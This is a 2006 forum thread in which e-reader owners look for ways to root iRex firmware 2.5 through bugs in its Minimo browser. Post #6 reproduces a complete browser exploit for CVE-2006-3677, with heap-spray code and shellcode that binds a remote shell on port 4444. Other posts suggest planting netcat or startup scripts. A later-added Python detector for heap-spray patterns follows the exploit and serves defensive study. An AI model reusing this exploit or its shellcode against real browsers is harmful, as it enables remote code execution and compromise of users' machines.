07-29-2006, 11:05 AM | #1
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Status quo
Can you tell me what is the current status quo for gaining root access in firmware 2.5? I know some people tried to brute force the password, alas that could take a *long* time.
07-29-2006, 12:00 PM | #2
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Brute forcing the password will not be needed, because a netcat can be installed, and even busybox incorporates one.
What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and also enabling the save as... window in any application would work. I do not know how to do it. An interesting list of mozilla bugs is here http://searchsecurity.techtarget.com...180286,00.html but I do not know if they apply to the modified minimo browser we run. Any other starting points would be appreciated. Users of 2.4 can try to upgrade to 2.5 keeping control along a delicate process, which I failed to complete successfully (but I describe it in a separate thread).
07-29-2006, 12:35 PM | #3
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:
http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo
A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?
07-29-2006, 01:18 PM | #4
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
07-29-2006, 01:39 PM | #5
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...
Quote:
07-29-2006, 01:43 PM | #6
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Here is the full code of the exploit. It seems it requires a Java plugin, which I am not sure exists in the case of Minimo.
Code:
<script>
// MoBB Demonstration
function Demo() {
    // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
    // https://bugzilla.mozilla.org/show_bug.cgi?id=342267
    // CVE-2006-3677
    // The Java plugin is required for this to work

    // win32 = calc.exe
    var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
    var fill_win32 = unescape('%u0800');
    var addr_win32 = 0x08000800;

    // linux = touch /tmp/METASPLOIT (unreliable)
    var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
    var fill_linux = unescape('%ua8a8');
    var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

    // mac os x ppc = bind a shell to 4444
    var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
    var fill_macppc = unescape('%u0c0c');
    var addr_macppc = 0x0c000000;

    // mac os x intel = bind a shell to 4444
    // Thanks to nemo[at]felinemenace.org for shellcode
    // Thanks to Todd Manning for the target information and testing
    var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
    var fill_macx86 = unescape('%u1c1c');
    var addr_macx86 = 0x1c000000;

    // Start the browser detection
    var shellcode;
    var addr;
    var fill;
    var ua = '' + navigator.userAgent;

    if (ua.indexOf('Linux') != -1) {
        alert('Trying to create /tmp/METASPLOIT');
        shellcode = shellcode_linux;
        addr = addr_linux;
        fill = fill_linux;
    }

    if (ua.indexOf('Windows') != -1) {
        alert('Trying to launch Calculator');
        shellcode = shellcode_win32;
        addr = addr_win32;
        fill = fill_win32;
    }

    if (ua.indexOf('PPC Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macppc;
        addr = addr_macppc;
        fill = fill_macppc;
    }

    if (ua.indexOf('Intel Mac OS') != -1) {
        alert('Trying to bind a shell to 4444');
        shellcode = shellcode_macx86;
        addr = addr_macx86;
        fill = fill_macx86;
    }

    if (! shellcode) {
        alert('OS not supported, only attempting a crash!');
        shellcode = unescape('%ucccc');
        fill = unescape('%ucccc');
        addr = 0x02020202;
    }

    var b = fill;
    while (b.length <= 0x400000) b+=b;

    var c = new Array();
    for (var i =0; i<36; i++) {
        c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode +
               b.substring(0, 0x100000 - shellcode.length) + shellcode +
               b.substring(0, 0x100000 - shellcode.length) + shellcode +
               b.substring(0, 0x100000 - shellcode.length) + shellcode;
    }

    if (window.navigator.javaEnabled) {
        window.navigator = (addr / 2);
        try {
            java.lang.reflect.Runtime.newInstance(
                java.lang.Class.forName("java.lang.Runtime"), 0
            );
            alert('Patched!');
        } catch(e) {
            alert('No Java plugin installed!');
        }
    }
}
</script>
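As an added defensive illustration (not code from this thread or from the MoBB demo), the Python heuristic below flags the structure the script above depends on: long unescape('%u...') literals, a string-doubling loop, and an array filled with copies of the padded string. Both sample snippets are constructed here; the filler literal is repeated %u9090 standing in for a payload, not real shellcode.

```python
import re

# Heuristics for the heap-spray structure used by the MoBB demo above:
#  1. long unescape('%uXXXX...') literals (shellcode or fill pattern)
#  2. a string-doubling loop:   while (b.length <= 0x400000) b += b;
#  3. an array filled with copies of padded string + payload
UNESCAPE_RE = re.compile(r"""unescape\(\s*['"]((?:%u[0-9a-fA-F]{4})+)['"]\s*\)""")
DOUBLING_RE = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<=?\s*(?:0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1"
)
SPRAY_RE = re.compile(r"for\s*\([^)]*\)\s*\{?\s*(\w+)\[\s*\w+\s*\]\s*=[^;]*\.substring\(")


def heap_spray_indicators(js: str) -> dict:
    """Return the individual indicators found in a chunk of script text."""
    literals = UNESCAPE_RE.findall(js)
    # each %uXXXX unit is 6 characters; count units in the longest literal
    longest = max((len(lit) // 6 for lit in literals), default=0)
    return {
        "unescape_literals": len(literals),
        "longest_unescape_units": longest,
        "string_doubling": bool(DOUBLING_RE.search(js)),
        "array_spray": bool(SPRAY_RE.search(js)),
    }


def is_suspected_heap_spray(js: str, min_units: int = 16) -> bool:
    """Flag only when the allocation pattern and a long literal co-occur,
    so a page that merely unescapes a few accented characters is not hit."""
    ind = heap_spray_indicators(js)
    return ind["string_doubling"] and ind["longest_unescape_units"] >= min_units


# Constructed samples (not taken from the thread). The filler is repeated
# %u9090 standing in for a payload; the benign page just decodes two letters.
FILLER = "%u9090" * 24
SUSPICIOUS = (
    "var payload = unescape('" + FILLER + "');\n"
    "var fill = unescape('%u0c0c');\n"
    "var b = fill;\n"
    "while (b.length <= 0x400000) b += b;\n"
    "var c = new Array();\n"
    "for (var i = 0; i < 36; i++) { c[i] = b.substring(0, 0x100000 - payload.length) + payload; }\n"
)
BENIGN = (
    "var label = unescape('%u00e9%u00e8');\n"
    "var rows = [];\n"
    "for (var i = 0; i < 10; i++) { rows[i] = 'row ' + i; }\n"
)

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, is_suspected_heap_spray(src), heap_spray_indicators(src))
```

Regex heuristics like these are easily evaded by obfuscation (split strings, String.fromCharCode, eval), so treat a hit as a triage signal for a page the device fetched, not as proof.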
07-29-2006, 01:45 PM | #7
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
07-29-2006, 02:42 PM | #8
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
I see some no-crack alternatives:
1) If chrome privileges are enabled or they can be reached, then a New File ('/tmp/example') javascript call is all we need. See http://docs.mandragor.org/files/Misc...-5-sect-5.html Problem being, I am not sure how fully the js libraries are provided in mozilla minimo (it is minimo). But perhaps they can be provided from any external file.
2) To learn how to build a javascript navigation toolbar *including Save As... button*; this button is disabled in minimo but it should exist. Perhaps invoking it does not require chrome privileges.
07-29-2006, 02:52 PM | #9
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
I think they messed up the save as routine, since you cannot save anything anywhere. I always got an error. They might have used a bogus tempfile, and so minimo can't save anything.
/edit: tried to install an xpi, but can't do that either.
07-29-2006, 03:11 PM | #10
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
07-29-2006, 03:22 PM | #11
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
Quote:
07-30-2006, 10:51 AM | #12
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
07-30-2006, 03:18 PM | #13
Member
Posts: 22
Karma: 10
Join Date: May 2006
Device: Sony Librié
Just as a clarification for the techno-idiot (me)... With 2.4 you could install all kinds of stuff and play with the system, and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!
07-30-2006, 04:05 PM | #14
Mad Scientist
Posts: 294
Karma: 242
Join Date: May 2006
Location: Germany
Device: Zaurus, HTCMagician, iLiad
Gavrahil, I would say:
With 2.4 you could try to install all kinds of stuff and try to play with the system.
07-31-2006, 06:11 AM | #15
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
I was not expecting to need an xpi plugin; perhaps something simpler, such as the old IE document.execCommand('SaveAs'), which requires user interaction and should not be a privileged command after all. PS: Mozilla security releases are at http://www.mozilla.org/projects/secu...abilities.html